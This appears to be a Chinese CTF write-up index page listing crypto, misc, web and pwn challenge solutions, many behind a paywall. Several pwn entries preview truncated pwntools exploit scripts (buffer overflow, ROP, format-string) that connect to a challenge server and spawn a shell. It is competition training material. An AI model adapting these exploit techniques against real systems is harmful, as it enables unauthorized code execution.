-
[moeCTF2020]easy木大定理
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 1月前
-
【鹤城杯2021】easy_crypto
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 2月前
-
Ez Vigenere
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 2月前
-
idekCTF-pyjail-revenge
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 2月前
-
idekCTF-pyjail
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 2月前
-
bird
下载完附件后直接解压,没有密码,里面是个docx文档。打开后可以看到这串鸟的图片应该就是密码。通过网络搜索或随波逐流可以找到密码来源birdsonawire。照着密码表一一对照可以得到flag{birdislovely}。
- Crypto
- 2月前
-
ret2libc
frompwnimport*host='49.232.142.230'port=10930p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')libc=ELF('./libc.so.6')main=elf.sym['main']rop=ROP(elf)rdi=rop.find_gadget(['poprdi']).addressre...
- PWN
- 2月前
-
rop64
frompwnimport*host='49.232.142.230'port=14014p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')rop=ROP(elf)offset=0x30-0x8rdi=rop.find_gadget(['poprdi','ret']).addressbinsh=next(elf.search('/...
- PWN
- 2月前
-
ret2text
frompwnimport*host='49.232.142.230'port=16954p=remote(host,port)elf=ELF('./pwn2')rop=ROP(elf)ret=rop.find_gadget(['ret']).addressshell=elf.sym['foo']p.recvuntil('exactly!\n')payload=b'a'*(0x70+0x8)+p6...
- PWN
- 2月前
-
rop32
frompwnimport*host='49.232.142.230'port=11277p=remote(host,port)p.recvuntil('Go!!!\n')elf=ELF('./pwn')binsh=next(elf.search('/bin/sh'))payload=b'a'*(0x1c+0x4)+p32(0x80491E7)+p32(binsh)p.sendline(paylo...
- PWN
- 2月前
-
babyfmt
frompwnimport*host='49.232.142.230'port=17264p=remote(host,port)context(arch='i386',log_level='debug',os='linux')elf=ELF("./pwn")key=elf.sym['backdoor']got=elf.got['read']payload=fmtstr_payload(11,{go...
- PWN
- 2月前
-
21年羊城杯签到
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 2月前
-
UMDCTF 2023-i-heart-wasm
我们可以在wasm二进制文件中嵌入自定义部分,并从JavaScript中访问它们。控制台输入:WebAssembly.compileStreaming(fetch("./pkg/wasm_test_bg.wasm")).then(mod=>{letflag="";for(leti=42;i>=0;i--){constsections=WebAssembly.Module.customS...
- WEB
- 2月前
-
strpos and substr
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 2月前
-
domainhackerMISC WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 2月前
-
sqlpacket.3WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 2月前
-
【2025湾区杯】checkwebshell
checkwebshellWireShark筛选HTTP包,大部分都是执行12=system("whoami");命令的,返回长度是277。所以我们按长度排序一下,把没意义的排除掉。使用这个Wireshark过滤语法http&&!(frame.len==277)找到第六个数据包,有点意思,追流,把数据复制出来。是一个PHP文件,可以观察到里面是实现了SM4算法的加密过程。里面那个注...
- MISC
- 2月前
-
zh3r0-v2 - Alice Bob Dave
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 2月前
-
泄露溯源定位.2
第一问解出来皆能找到到github上搜dcf_customerhttps://github.com/Tristan-Hao/Green-Berry/blob/main/catalogue.pyflag{https://github.com/Tristan-Hao/Green-Berry/blob/main/catalogue.py}
- MISC
- 2月前
-
idekCTF2024 MemoryFS WriteUp
先nc随后执行:mkdirflag.txtmkdirflag.txt/blnflag.txtacda/brm/acd../rm/flag.txt/brm/flag.txtcreate_flagcat$PWD获取idek{***************}
- MISC
- 3月前